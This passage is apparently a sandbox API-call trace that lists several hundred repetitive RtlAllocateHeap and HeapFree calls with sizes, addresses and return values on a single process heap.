[0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.355] RtlAllocateHeap 